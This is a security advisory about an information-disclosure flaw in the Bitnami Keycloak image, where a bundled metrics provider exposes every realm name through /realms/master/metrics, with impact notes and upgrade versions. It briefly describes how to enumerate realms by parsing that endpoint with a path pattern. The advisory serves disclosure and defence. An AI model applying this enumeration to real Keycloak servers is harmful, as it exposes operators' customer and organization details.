The Bitnami Keycloak image uses the provider aerogear/keycloak-metrics-spi (/opt/bitnami/keycloak/providers/keycloak-metrics-spi-*.jar). The provider serves an OpenTelemetry compatible endpoint for usage metrics of the realms endpoint. This provider isn't required for the metrics functionality of Keycloak itself.
The realm metrics endpoint can't be deactivated by disabling all metrics of Keycloak. Documentation on how to disable the provider or this specific endpoint, besides deleting or blocking it, isn't documented.

By parsing the metrics endpoint of the default created master realm /realms/master/metrics, all used realms of a Keycloak instance can be extracted. The provider doesn't differentiate between the different metrics for each realm. The metrics are provided for all realms and can be accessed via /realms/{REALM_NAME}/metrics too.

By parsing the routes for the pattern /realms/[^/"]+, the realm name can be extracted and used to gather the realm display name of a realm.

The metrics data also includes non-functional paths (like non-existing realms). Each accessed path under the /realms is recorded.

Impact

Listing realms (including display names) can expose sensitive details:

• Operators – Customer lists using an IdP with Keycloak could be revealed.
• Operators/Developers – Development realms could be identified.
• Organizations – Organizations using an IdP could be disclosed.

Metrics data may also expose sensitive information, such as passwords mistakenly used as realm names:

• Operators – Creates an easy attack vector; metrics must be monitored for leaks.
• Users – Secrets could be unintentionally exposed.

Mitigation

The recommended action is to upgrade Keycloak to use 26.3.2-1 (container image 26.3.2-debian-12-r2) or a newer version.
In the case of the Helm chart, upgrade to 25.0.0 or a newer version.